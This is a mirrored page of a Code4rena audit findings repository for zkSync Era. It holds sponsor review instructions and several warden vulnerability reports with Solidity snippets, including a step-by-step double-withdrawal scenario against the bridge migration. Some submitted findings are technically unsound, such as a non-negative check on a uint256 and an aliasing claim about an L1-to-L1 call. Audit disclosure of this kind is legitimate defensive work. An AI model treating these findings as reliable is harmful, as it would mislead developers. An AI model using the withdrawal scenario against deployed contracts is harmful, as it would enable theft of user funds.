GithubHelp home page GithubHelp logo

2024-03-zksync-findings's Introduction

zkSync Era Audit

Unless otherwise discussed, this repo will be made public after audit completion, sponsor review, judging, and issue mitigation window.

Contributors to this repo: prior to report publication, please review the Agreements & Disclosures issue.


Audit findings are submitted to this repo

Sponsors have three critical tasks in the audit process:

  1. Respond to issues.
  2. Weigh in on severity.
  3. Share your mitigation of findings.

Let's walk through each of these.

High and Medium Risk Issues

Wardens submit issues without seeing each other's submissions, so keep in mind that there will always be findings that are duplicates. For all issues labeled 3 (High Risk) or 2 (Medium Risk), these have been pre-sorted for you so that there is only one primary issue open per unique finding. All duplicates have been labeled duplicate, linked to a primary issue, and closed.

Judges have the ultimate discretion in determining validity and severity of issues, as well as whether/how issues are considered duplicates. However, sponsor input is a significant criterion.

Respond to issues

For each High or Medium risk finding that appears in the dropdown at the top of the chrome extension, please label as one of these:

  • sponsor confirmed, meaning: "Yes, this is a problem and we intend to fix it."
  • sponsor disputed, meaning either: "We cannot duplicate this issue" or "We disagree that this is an issue at all."
  • sponsor acknowledged, meaning: "Yes, technically the issue is correct, but we are not going to resolve it for xyz reasons."

Add any necessary comments explaining your rationale for your evaluation of the issue.

Note that when the repo is public, after all issues are mitigated, wardens will read these comments; they may also be included in your C4 audit report.

Weigh in on severity

If you believe a finding is technically correct but disagree with the listed severity, select the disagree with severity option, along with a comment indicating your reasoning for the judge to review. You may also add questions for the judge in the comments. (Note: even if you disagree with severity, please still choose one of the sponsor confirmed or sponsor acknowledged options as well.)

For a detailed breakdown of severity criteria and how to estimate risk, please refer to the judging criteria in our documentation.

QA reports, Gas reports, and Analyses

All warden submissions in these three categories are submitted as bulk listings of issues and recommendations:

  • QA reports include all low severity and non-critical findings from an individual warden.
  • Gas reports include all gas optimization recommendations from an individual warden.
  • Analyses contain high-level advice and review of the code: the "forest" to individual findings' "trees.”

For QA reports, Gas reports, and Analyses, sponsors are not required to weigh in on severity or risk level. We ask that sponsors:

  • Leave a comment for the judge on any reports you consider to be particularly high quality. (These reports will be awarded on a curve.)
  • For QA and Gas reports only: add the sponsor disputed label to any reports that you think should be completely disregarded by the judge, i.e. the report contains no valid findings at all.

Once labelling is complete

When you have finished labelling findings, drop the C4 team a note in your private Discord backroom channel and let us know you've completed the sponsor review process. At this point, we will pass the repo over to the judge to review your feedback while you work on mitigations.

Share your mitigation of findings

Note: this section does not need to be completed in order to finalize judging. You can continue work on mitigations while the judge finalizes their decisions and even beyond that. Ultimately we won't publish the final audit report until you give us the OK.

For each finding you have confirmed, you will want to mitigate the issue before the contest report is made public.

If you are planning a Code4rena mitigation review:

  1. In your own Github repo, create a branch based off of the commit you used for your Code4rena audit, then
  2. Create a separate Pull Request for each High or Medium risk C4 audit finding (e.g. one PR for finding H-01, another for H-02, etc.)
  3. Link the PR to the issue that it resolves within your contest findings repo.

Most C4 mitigation reviews focus exclusively on reviewing mitigations of High and Medium risk findings. Therefore, QA and Gas mitigations should be done in a separate branch. If you want your mitigation review to include QA or Gas-related PRs, please reach out to C4 staff and let’s chat!

If several findings are inextricably related (e.g. two potential exploits of the same underlying issue, etc.), you may create a single PR for the related findings.

If you aren’t planning a mitigation review

  1. Within a repo in your own GitHub organization, create a pull request for each finding.
  2. Link the PR to the issue that it resolves within your contest findings repo.

This will allow for complete transparency in showing the work of mitigating the issues found in the contest. If the issue in question has duplicates, please link to your PR from the open/primary issue.

2024-03-zksync-findings's People

Contributors

c4-bot-10 avatar c4-bot-3 avatar c4-bot-5 avatar c4-bot-1 avatar c4-bot-8 avatar c4-bot-9 avatar c4-bot-6 avatar c4-bot-7 avatar c4-bot-4 avatar c4-bot-2 avatar c4-judge avatar kartoonjoy avatar knownfactc4 avatar

Stargazers

Victor Cañada Ojeda avatar

Watchers

Ashok avatar

Forkers

melo0806a

2024-03-zksync-findings's Issues

Security Vulnerabilities and Access Control Issues in Governance.sol Smart Contract

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/governance/Governance.sol/README.md?plain=1#L249

Vulnerability details

  1. Access Control and Permissions:

Error: The updateDelay and updateSecurityCouncil functions can be called by the contract itself (onlySelf modifier), which poses a security risk if these functions are not intended for internal use only.

Solution: Ensure that only authorized users or contracts can call these functions by implementing proper access control mechanisms. Remove the onlySelf modifier or adjust it to restrict access to authorized users.

function updateDelay(uint256 _newDelay) external onlyOwner {
emit ChangeMinDelay(minDelay, _newDelay);
minDelay = _newDelay;
}

function updateSecurityCouncil(address _newSecurityCouncil) external onlyOwner {
emit ChangeSecurityCouncil(securityCouncil, _newSecurityCouncil);
securityCouncil = _newSecurityCouncil;
}

  1. Potential Reentrancy Vulnerability:

Error: The _execute function does not have proper error handling for failed external calls, which may lead to reentrancy vulnerabilities if external calls fail unexpectedly.

Solution: Implement proper error handling in the _execute function to revert the transaction if an external call fails. This prevents potential reentrancy attacks. Use the require(success, "External call failed"); statement after each external call to revert the transaction in case of failure.

function _execute(Call[] calldata _calls) internal {
for (uint256 i = 0; i < _calls.length; ++i) {
(bool success, bytes memory returnData) = _calls[i].target.call{value: _calls[i].value}(_calls[i].data);
require(success, "External call failed");
}
}

  1. Gas-related Vulnerabilities:

Error: The _execute function does not check the gas consumption of external calls, which may lead to out-of-gas errors or vulnerabilities if the gas limit is exceeded.

Solution: Perform gas estimation for external calls in the _execute function to ensure that the gas limit is not exceeded. Consider using the gasleft() function to estimate gas consumption and handle gas-related issues appropriately.

function _execute(Call[] calldata _calls) internal {
for (uint256 i = 0; i < _calls.length; ++i) {
// Estimate gas consumption for external calls
uint256 gasLimit = gasleft() - 5000; // Adjust gas limit as needed
(bool success, bytes memory returnData) = _calls[i].target.call{value: _calls[i].value, gas: gasLimit}(_calls[i].data);
require(success, "External call failed");
}
}

  1. Potential Timestamp Manipulation:

Error: The _schedule function allows operations to be scheduled in the past if _delay is set to a negative value, which may lead to timestamp manipulation vulnerabilities.

Solution: Add a check in the _schedule function to ensure that _delay is a non-negative value to prevent scheduling operations in the past. Use require(_delay >= 0, "Delay must be non-negative"); to enforce this condition.

function _schedule(bytes32 _id, uint256 _delay) internal {
require(!isOperation(_id), "Operation with this proposal id already exists");
require(_delay >= 0, "Delay must be non-negative"); // Add this line
require(_delay >= minDelay, "Proposed delay is less than minimum delay");

timestamps[_id] = block.timestamp + _delay;

}

Assessed type

Error

QA Report

See the markdown file with the details of this report here.

It's not possible to upgrade chainId

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/StateTransitionManager.sol#L202-L217
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/upgrades/BaseZkSyncUpgrade.sol#L147-L157

Vulnerability details

Impact

Function StateTransitionManager._setChainIdUpgrade() which is responsible for upgrading chainId, sets VerifierParams with the values which won't be accepted by BaseZkSyncUpgrade._setVerifierParams() function.
Because of that - upgrading chainId won't be possible.

Proof of Concept

File: StateTransitionManager.sol

ProposedUpgrade memory proposedUpgrade = ProposedUpgrade({
            l2ProtocolUpgradeTx: l2ProtocolUpgradeTx,
            factoryDeps: bytesEmptyArray,
            bootloaderHash: bytes32(0),
            defaultAccountHash: bytes32(0),
            verifier: address(0),
            verifierParams: VerifierParams({
                recursionNodeLevelVkHash: bytes32(0),
                recursionLeafLevelVkHash: bytes32(0),
                recursionCircuitsSetVksHash: bytes32(0)
            }),
            l1ContractsUpgradeCalldata: new bytes(0),
            postUpgradeCalldata: new bytes(0),
            upgradeTimestamp: 0,
            newProtocolVersion: protocolVersion
        });

As demonstrated above, function StateTransitionManager._setChainIdUpgrade() sets VerifierParams to:

            verifierParams: VerifierParams({
                recursionNodeLevelVkHash: bytes32(0),
                recursionLeafLevelVkHash: bytes32(0),
                recursionCircuitsSetVksHash: bytes32(0)

However, those params won't be accepted by BaseZkSyncUpgrade._setVerifierParams() function.

File: BaseZkSyncUpgrade.sol

		if (
            _newVerifierParams.recursionNodeLevelVkHash == bytes32(0) &&
            _newVerifierParams.recursionLeafLevelVkHash == bytes32(0) &&
            _newVerifierParams.recursionCircuitsSetVksHash == bytes32(0)
        ) {
            return;
        }

        VerifierParams memory oldVerifierParams = s.verifierParams;
        s.verifierParams = _newVerifierParams;
        emit NewVerifierParams(oldVerifierParams, _newVerifierParams);

As demonstrated above, when either of the parameter is bytes32(0) - function BaseZkSyncUpgrade._setVerifierParams() will return, instead of continuing executing and updating VerifierParams.

The flow can be summarized as below:

  1. StateTransitionManager._setChainIdUpgrade() sets recursionNodeLevelVkHash, recursionLeafLevelVkHash, recursionCircuitsSetVksHash to bytes32(0).
  2. BaseZkSyncUpgrade._setVerifierParams() - lines 147-153: _newVerifierParams.recursionNodeLevelVkHash == bytes32(0) && _newVerifierParams.recursionLeafLevelVkHash == bytes32(0) && _newVerifierParams.recursionCircuitsSetVksHash == bytes32(0) condition is fulfilled, thus function returns, instead of upgrading VerifierParams.

This leads to the conclusion, that it's not possible to upgrade chainId, because StateTransitionManager._setChainIdUpgrade() sets VerifierParams to the bytes32(0), and according to BaseZkSyncUpgrade._setVerifierParams() - those parameters cannot be empty.

Tools Used

Manual code review

Recommended Mitigation Steps

When calling StateTransitionManager._setChainIdUpgrade(), make sure that VerifierParams (recursionNodeLevelVkHash, recursionLeafLevelVkHash, recursionCircuitsSetVksHash) are not empty and set them to the values accepted by BaseZkSyncUpgrade._setVerifierParams().

Assessed type

Invalid Validation

QA Report

See the markdown file with the details of this report here.

User might be able to double withdraw during migration

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L421-L427
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L375

Vulnerability details

Impact

A user might be able to double withdraw during migration in some edge conditions: (1) if their withdrawal tx is included in a batch number the same or after eraFirstPostUpgradeBatch; (2)And if the user finalizeWithdrawal on the old L1ERC20Bridge.sol before L1ERC20Bridge.sol is upgraded.

Proof of Concept

The current migration process takes place in steps, which might allow edge conditions to occur. StepA: deploy new contracts(including L1SharedBridge); StepB:Era upgrade and L2 system contracts upgrade(at this point old L1ERC20Bridge still works); StepC: Upgrade L2 bridge and L1ERC20Brdige.sol. Then migrate funds to the new L1sharedBridge.

Since L1ERC20Bridge.sol is upgraded at the end. An edge condition can occur between StepA and StepB, where a user can still withdraw ERC20 tokens on the old L1ERC20Brdige.sol.

Scenario: If a user finalizeWithdrawal ERC20 tokens on the old L1ERC20Bridge.sol first, they can withdraw again on L1SharedBridge.sol as long as the _l2batchNumber of the withdraw tx equals or is greater than eraFirstPostUpgradeBatch. In other words, _isEraLegacyWithdrawal check can be invalidated.

  1. stepA: L1SharedBridge.sol will be deployed and initialized with a pre-determined value eraFirstPostUpgradeBatch;
  2. UserA can initiate an ERC20 withdrawal tx on L2 bridge(currently old version);
  3. stepB: Era upgrade is performed. UserA's withdrawal tx is included in the same eraFirstPostUpgradeBatch number;
  4. UserA finializeWithdrawal on the old L1ERC20Brdige.sol.UserA should receive funds because funds haven't been migrated yet;
  5. stepC: new L1ERC20Bridge.sol is upgraded and funds(ERC20) are migrated to L1SharedBridge.sol;
  6. UserA finializeWithdrawal on L1SharedBridge.sol. This time, _isEraLegacyWithdrawal(_chainId, _l2BatchNumber) check will be bypassed,because user's _l2BatchNumber == eraFirstPostUpgradeBatch; UserA can receive the withdrawal funds a second time;
//code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol
    function finalizeWithdrawal(
        uint256 _chainId,
        uint256 _l2BatchNumber,
        uint256 _l2MessageIndex,
        uint16 _l2TxNumberInBatch,
        bytes calldata _message,
        bytes32[] calldata _merkleProof
    ) external override {
       //@audit-info when _l2BatchNumber>= eraFirstPostUpgradeBatch, `_isEraLegacyWithdrawal()` return false, checking on withdrawal status on legacyERC20bridge will be bypassed.
|>     if (_isEraLegacyWithdrawal(_chainId, _l2BatchNumber)) {
            require(
                !legacyBridge.isWithdrawalFinalized(
                    _l2BatchNumber,
                    _l2MessageIndex
                ),
                "ShB: legacy withdrawal"
            );
        }
        _finalizeWithdrawal(
            _chainId,
            _l2BatchNumber,
            _l2MessageIndex,
            _l2TxNumberInBatch,
            _message,
            _merkleProof
        );
}

(https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L421-L427)

//code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol
    function _isEraLegacyWithdrawal(
        uint256 _chainId,
        uint256 _l2BatchNumber
    ) internal view returns (bool) {
        return
            (_chainId == ERA_CHAIN_ID) &&
|>          (_l2BatchNumber < eraFirstPostUpgradeBatch); //@audit-info note:when _l2BatchNumber>= eraFirstPostUpgradeBatch, `_isEraLegacyWithdrawal()` return false.
    }

(https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L375)
As seen, checking on legacyERC20bridge withdrawal status will only be performed when _isEraLegacyWithdrawal returns true. But due to _l2BatchNumber of a withdrawal tx during the upgrade can equal or be greater than a predefined eraFirstPostUpgradeBatch. _isEraLegacyWithdrawal check can be based on false assumptions on _l2BatchNumber and eraFirstPostUpgradeBatch, allowing double withdrawal on edge cases.

Tools Used

Manual

Recommended Mitigation Steps

Consider adding a grace period during and following an upgrade, during which time legacyWithdrawal status will always be checked.

Assessed type

Other

User might not be able to withdraw WETH/ETH on L1 with legacy l2Batchnumber, resulting in ETH permanently locked in L1SharedBridge.sol

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L443-L447

Vulnerability details

Impact

A user might not be able to withdraw WETH/ETH on L1 with legacy l2Batchnumber, resulting in ETH permanently locked in L1SharedBridge.sol.

The new Mailbox is not always backward compatible.

Proof of Concept

New Mailbox and L1SharedBridge are intended to be backward compatible. But the current implementation of Mailbox.sol and L1SharedBridge.sol' s withdrawal flow might cause certain legacy WETH deposits to be locked when withdrawn.

Suppose a user deposited WETH before the upgrade through old L1WETHBridge.sol.
Now user initiated the withdrawal of WETH from old L2WETHBridge.sol before ERA upgrade.

(1) Since upgrade hasn't started or is about to start, user would still interact with the old L2WETHBridge.sol withdraw(), which burns user's L2Weth for ETH and send a ETH withdraw through L2_ETH_ADDRESS.withdrawWithMessage{value: _amount}(l1Bridge, wethMessage);. Note that this set l1Bridge as the l1 receiver (old L1WETHbridge.sol). The user designated _l1Receiver is part of wethMessage.

//L2WethBridge.sol (legacy, for reference only)
    function withdraw(
        address _l1Receiver,
        address _l2Token,
        uint256 _amount
    ) external override {
...
        // WETH withdrawal message.
        bytes memory wethMessage = abi.encodePacked(_l1Receiver);

        // Withdraw ETH to L1 bridge.
        //@audit-info note: legacy L2WethBridge will put L1WethBridge address as l1Reciver. Actual user address(`_l1Receiver`) will be encoded in message.
|>       L2_ETH_ADDRESS.withdrawWithMessage{value: _amount}(l1Bridge, wethMessage);

(2) Now if L1 ERA upgrade hasn't started yet, the user will still call L1WethBrdige.sol's finalizeWithdrawal() to withdraw WETH. However, if L1 ERA-upgrade settles first before the user's finalizeWithdrawal() call. L1WethBridge.sol's finalizeWithdrawal() tx will call the new mailbox's finalizeEthWithdrawal() function.

The problem occurs here: Although the new Mailbox.sol maintains finalizeEthWithdrawal(), this won't be backward compatible with a legacy WETH withdrawal flow.

The new finalizeEthWithdrawal() will call L1SharedBridge's finalizeWithdrawal(). L1SharedBridge will send ETH to l1Reciver(L1WethBridge address, Not the user's address). However, the ETH transfer will revert due to L1WethBridge.sol will not recognize L1SharedBridge.sol's address and revert in the receive() fallback.

//code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol
    function finalizeEthWithdrawal(
        uint256 _l2BatchNumber,
        uint256 _l2MessageIndex,
        uint16 _l2TxNumberInBatch,
        bytes calldata _message,
        bytes32[] calldata _merkleProof
    ) external nonReentrant {
...
          //@audit-info note: in a legacy Weth withdrawal flow, new Mailbox will pass control flow to L1SharedBridge
|>        IL1SharedBridge(s.baseTokenBridge).finalizeWithdrawal(
            ERA_CHAIN_ID,
            _l2BatchNumber,
            _l2MessageIndex,
            _l2TxNumberInBatch,
            _message,
            _merkleProof
        );

(https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol#L186)

//code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol
    function _finalizeWithdrawal(
        uint256 _chainId,
        uint256 _l2BatchNumber,
        uint256 _l2MessageIndex,
        uint16 _l2TxNumberInBatch,
        bytes calldata _message,
        bytes32[] calldata _merkleProof
    )
...
          //@audit-info note: when a user finalize a legacy weth withdrawal, this l1Receiver will be legacy L1WethBrdige address, not the actual user withdrawal receiver
|>        (l1Receiver, l1Token, amount) = _checkWithdrawal(_chainId, messageParams, _message, _merkleProof);
...
        if (l1Token == ETH_TOKEN_ADDRESS) {
            bool callSuccess;
            // Low-level assembly call, to avoid any memory copying (save gas)
            assembly {
                  //@audit-info note: in the flow of a user finalize a legacy weth withdrawal, this ETH transfer will revert at L1WethBridge.sol receive fallback.
|>                callSuccess := call(gas(), l1Receiver, amount, 0, 0, 0, 0)
            }

(https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L443-L447)

//L1WethBridge.sol (legacy, for reference only)
    receive() external payable {
        // Expected to receive ether in two cases:
        // 1. l1 WETH sends ether on `withdraw`
        // 2. zkSync contract withdraw funds in `finalizeEthWithdrawal`
          //@audit-info note: a legacy Weth finalize withdrawal will revert, because msg.sender will now be L1SharedBridge.sol
 |>       require(msg.sender == l1WethAddress || msg.sender == address(zkSync), "pn");
        emit EthReceived(msg.value);
    }

Note: if the user calls finalizeEthWithdrawal() directly on the new Mailbox.sol, this will also revert due to the same reason above.

Because the old L2WethBridge.sol will code L1Wethbridge.sol as L1receiver, any attempts of Weth withdrawal on L2 close to or during ERA upgrade might result in ETH permanently locked on L1SharedBridge.sol. User will lose funds.

Tools Used

Manual

Recommended Mitigation Steps

since the new Mailbox's intended to be backward compatible and there will be legacy Weth withdrawal tx, it needs to be ensured that on-going users' legacy weth withdrawal tx will not lock funds on L1SharedBridge.

Consider refactoring Mailbox's finalizeEthWithdrawal() to be compatible with the legacy Weth withdrawal flow.

Assessed type

Other

msg.sender has to be un-aliased in L1ERC20Bridge.tranferTokenToSharedBridge()

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1ERC20Bridge.sol#L64

Vulnerability details

Impact

Users who deposit tokens in L1ERC20Bridge will not receive them on the shared Bridge because the check require(msg.sender == address(sharedBridge) will always revert.

Vulnerability details

L1ERC20Bridge.tranferTokenToSharedBridge() checks that msg.sender is sharedBridge:

require(msg.sender == address(sharedBridge), "Not shared bridge"); 

However, since the function is called directly as a L1ERC20Bridge - sharedBridge transaction initiated by sharedBridge, which is a contract, msg.sender will actually be the aliased address of sharedBridge. sharedBridge is the un-aliased address of the bridge. As such, this check will always revert, thus users who deposit tokens in L1ERC20Bridge will not receive them on the shared Bridge.
L1ERC20Bridge.sol#L64

function tranferTokenToSharedBridge(address _token, uint256 _amount) external {
@>        require(msg.sender == address(sharedBridge), "Not shared bridge");
        uint256 amount = IERC20(_token).balanceOf(address(this));
        require(amount == _amount, "Incorrect amount");
        IERC20(_token).safeTransfer(address(sharedBridge), amount);
    }

The vulnerability is similar to spearbit-blast-report-1 where the check require(msg.sender == address(OTHER_BRIDGE),""); will always revert as msg.sender will be the aliased address of L1BlastBridge and OTHER_BRIDGE is the un-aliased address of L1BlastBridge.

Tools Used

Manual Review

Recommended Mitigation Steps

Un-alias msg.sender in the check as such:

-- require(msg.sender == address(sharedBridge), "Not shared bridge");
++ require(AddressAliasHelper.undoL1ToL2Alias(msg.sender) == address(sharedBridge), "Not shared bridge");

Assessed type

Error

Agreements & Disclosures

Agreements

If you are a C4 Certified Contributor by commenting or interacting with this repo prior to public release of the contest report, you agree that you have read the Certified Warden docs and agree to be bound by:

To signal your agreement to these terms, add a 👍 emoji to this issue.

Code4rena staff reserves the right to disqualify anyone from this role and similar future opportunities who is unable to participate within the above guidelines.

Disclosures

Sponsors may elect to add team members and contractors to assist in sponsor review and triage. All sponsor representatives added to the repo should comment on this issue to identify themselves.

To ensure contest integrity, the following potential conflicts of interest should also be disclosed with a comment in this issue:

  1. any sponsor staff or sponsor contractors who are also participating as wardens
  2. any wardens hired to assist with sponsor review (and thus presenting sponsor viewpoint on findings)
  3. any wardens who have a relationship with a judge that would typically fall in the category of potential conflict of interest (family, employer, business partner, etc)
  4. any other case where someone might reasonably infer a possible conflict of interest.

Faucet Position is not Deleted after Deleting Faucet

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/libraries/Diamond.sol#L261-L273

Vulnerability details

Impact

Wrong implementation and data access risk as Faucet Position is not Deleted after Deleting Faucet in Diamond.sol contract

Proof of Concept

 function _removeFacet(address _facet) private {
        DiamondStorage storage ds = getDiamondStorage();

        // Get index of `DiamondStorage.facets` of the facet and last element of array
>>>        uint256 facetPosition = ds.facetToSelectors[_facet].facetPosition;
>>>        uint256 lastFacetPosition = ds.facets.length - 1;

        // If the facet is not at the end of the array then move the last element to the facet position
        if (facetPosition != lastFacetPosition) {
            address lastFacet = ds.facets[lastFacetPosition];

            ds.facets[facetPosition] = lastFacet;
            ds.facetToSelectors[lastFacet].facetPosition = facetPosition.toUint16();
        }

        // Remove last element from the facets array
>>>        ds.facets.pop();
    }

Without going into complex details the function above shows how Faucet is removed from the Diamond contract, the problem is that only the Facet is popped out, but the position the faucet holds was not deleted from storage thereby causing a situation whereby different faucets are holding the same position in contract, the significance of this oversight can be noted in how removal of selector was handled at L247, deleting the position is as important as deleting the faucet itself.

Tools Used

Manual Review

Recommended Mitigation Steps

Protocol should consider resetting faucet position to type(uint16).max to represent the fact that it has been deleted or simply delete the faucet from storage in a similar pattern that selector was handled at L247 as provided below

 function _removeFacet(address _facet) private {
        DiamondStorage storage ds = getDiamondStorage();

        // Get index of `DiamondStorage.facets` of the facet and last element of array
        uint256 facetPosition = ds.facetToSelectors[_facet].facetPosition;
        uint256 lastFacetPosition = ds.facets.length - 1;

        // If the facet is not at the end of the array then move the last element to the facet position
        if (facetPosition != lastFacetPosition) {
            address lastFacet = ds.facets[lastFacetPosition];

            ds.facets[facetPosition] = lastFacet;
            ds.facetToSelectors[lastFacet].facetPosition = facetPosition.toUint16();
        }

        // Remove last element from the facets array
        ds.facets.pop();
+++   delete ds.facetToSelectors[_facet]; 
    }

Assessed type

Access Control

`getCanonicalL1TxHash()` may return the same hash for different transactions

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/bootloader/bootloader.yul#L692-L707

Vulnerability details

Impact

Function getCanonicalL1TxHash() returns a canonical hash of the L1->L2 transaction, that will be sent to L1 as a message to the L1 contract that a certain operation has been processed.

Since it accepts just a txDataOffset, two different transactions with the same offset will return the same hash.

Proof of Concept

File: bootloader.yul

/// @dev Calculates the canonical hash of the L1->L2 transaction that will be
            /// sent to L1 as a message to the L1 contract that a certain operation has been processed.
            function getCanonicalL1TxHash(txDataOffset) -> ret {
                // Putting the correct value at the `txDataOffset` just in case, since 
                // the correctness of this value is not part of the system invariants.
                // Note, that the correct ABI encoding of the Transaction structure starts with 0x20
                mstore(txDataOffset, 32)

                let innerTxDataOffset := add(txDataOffset, 32)
                let dataLength := safeAdd(32, getDataLength(innerTxDataOffset), "qev")

                debugLog("HASH_OFFSET", innerTxDataOffset)
                debugLog("DATA_LENGTH", dataLength)

                ret := keccak256(txDataOffset, dataLength)
            }

Let's consider two different L1->L2 transactions with the same offset. Since for both transactions offset is the same, the parameter txDataOffset will be the same for function getCanonicalL1TxHash(). This leads to the conclusion, that getCanonicalL1TxHash() will return the same hash, for two different transactions, when their offsets are the same.

Tools Used

Manual code review

Recommended Mitigation Steps

Refactor getCanonicalL1TxHash() - so that it will contain additional parameter - nonce. This nonce should also be used for hash calculation. Adding additional parameter nonce will make sure that getCanonicalL1TxHash() will return different hashes even for the transactions with the same txDataOffset.

Assessed type

Other

Chain Cannot be unFreezed after Freezing by State Transition Manager

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/StateTransitionManager.sol#L165
https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Admin.sol#L143

Vulnerability details

Impact

Denial of Service When State Transition Manager wants to Unfreeze Chain as the unfreeze function calls freezeDiamond() again instead of calling unfreezeDiamond()

Proof of Concept

 /// @dev freezes the specified chain
    function freezeChain(uint256 _chainId) external onlyOwner {
        IZkSyncStateTransition(stateTransition[_chainId]).freezeDiamond();
    }

>>>    /// @dev freezes the specified chain
    function unfreezeChain(uint256 _chainId) external onlyOwner {
>>>        IZkSyncStateTransition(stateTransition[_chainId]).freezeDiamond();
    }

The code above from the StateTransitionManager contract shows how freezing and unfreezing is done, however there is a mistake with the implementation of the unfreeze function, it calls freezeDiamond() instead of unfreezeDiamond() which will cause Denial of Service and unfreezing would never be possible again.
The code provided below is from the Admin.sol contract, it shows there is indeed an implementation for both freezing and unfreezing which proves that the implementation in the unfreezeChain(...) function in the StateTransitionManager contract was indeed an error which would break protocol functionality.

   /// @inheritdoc IAdmin
    function freezeDiamond() external onlyAdminOrStateTransitionManager {
        Diamond.DiamondStorage storage diamondStorage = Diamond.getDiamondStorage();

        require(!diamondStorage.isFrozen, "a9"); // diamond proxy is frozen already
        diamondStorage.isFrozen = true;

        emit Freeze();
    }

    /// @inheritdoc IAdmin
    function unfreezeDiamond() external onlyAdminOrStateTransitionManager {
        Diamond.DiamondStorage storage diamondStorage = Diamond.getDiamondStorage();

        require(diamondStorage.isFrozen, "a7"); // diamond proxy is not frozen
        diamondStorage.isFrozen = false;

        emit Unfreeze();
    }

Tools Used

Manual Review

Recommended Mitigation Steps

The protocol should make necessary correction as provided below

 /// @dev freezes the specified chain
    function freezeChain(uint256 _chainId) external onlyOwner {
        IZkSyncStateTransition(stateTransition[_chainId]).freezeDiamond();
    }

---    /// @dev freezes the specified chain
+++    /// @dev unfreezes the specified chain
    function unfreezeChain(uint256 _chainId) external onlyOwner {
---        IZkSyncStateTransition(stateTransition[_chainId]).freezeDiamond();
+++        IZkSyncStateTransition(stateTransition[_chainId]).unfreezeDiamond();
    }

Assessed type

Error

Unclaimed Failed Deposit would be Lost due to Overide by new Failed Deposit Transaction Data Hash

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L600

Vulnerability details

Impact

When Unclaimed Failed Deposit has not been claimed a new one would override it due to missing validation before resetting it which would allow lose of fund in the L1SharedBridge contract.

Proof of Concept

 function depositLegacyErc20Bridge(
        address _prevMsgSender,
        address _l2Receiver,
        address _l1Token,
        uint256 _amount,
        uint256 _l2TxGasLimit,
        uint256 _l2TxGasPerPubdataByte,
        address _refundRecipient
    ) external payable override onlyLegacyBridge nonReentrant returns (bytes32 l2TxHash) {
        require(l2BridgeAddress[ERA_CHAIN_ID] != address(0), "ShB b. n dep");
        require(_l1Token != l1WethAddress, "ShB: WETH deposit not supported 2");

        // Note that funds have been transferred to this contract in the legacy ERC20 bridge.
        if (!hyperbridgingEnabled[ERA_CHAIN_ID]) {
            chainBalance[ERA_CHAIN_ID][_l1Token] += _amount;
        }

        bytes memory l2TxCalldata = _getDepositL2Calldata(_prevMsgSender, _l2Receiver, _l1Token, _amount);

        {
            // If the refund recipient is not specified, the refund will be sent to the sender of the transaction.
            // Otherwise, the refund will be sent to the specified address.
            // If the recipient is a contract on L1, the address alias will be applied.
            address refundRecipient = _refundRecipient;
            if (_refundRecipient == address(0)) {
                refundRecipient = _prevMsgSender != tx.origin
                    ? AddressAliasHelper.applyL1ToL2Alias(_prevMsgSender)
                    : _prevMsgSender;
            }

            L2TransactionRequestDirect memory request = L2TransactionRequestDirect({
                chainId: ERA_CHAIN_ID,
                l2Contract: l2BridgeAddress[ERA_CHAIN_ID],
                mintValue: msg.value, // l2 gas + l2 msg.Value the bridgehub will withdraw the mintValue from the base token bridge for gas
                l2Value: 0, // L2 msg.value, this contract doesn't support base token deposits or wrapping functionality, for direct deposits use bridgehub
                l2Calldata: l2TxCalldata,
                l2GasLimit: _l2TxGasLimit,
                l2GasPerPubdataByteLimit: _l2TxGasPerPubdataByte,
                factoryDeps: new bytes[](0),
                refundRecipient: refundRecipient
            });
            l2TxHash = bridgehub.requestL2TransactionDirect{value: msg.value}(request);
        }

        bytes32 txDataHash = keccak256(abi.encode(_prevMsgSender, _l1Token, _amount));
        // Save the deposited amount to claim funds on L1 if the deposit failed on L2
>>>        depositHappened[ERA_CHAIN_ID][l2TxHash] = txDataHash;

        emit LegacyDepositInitiated(ERA_CHAIN_ID, l2TxHash, _prevMsgSender, _l2Receiver, _l1Token, _amount);
    }

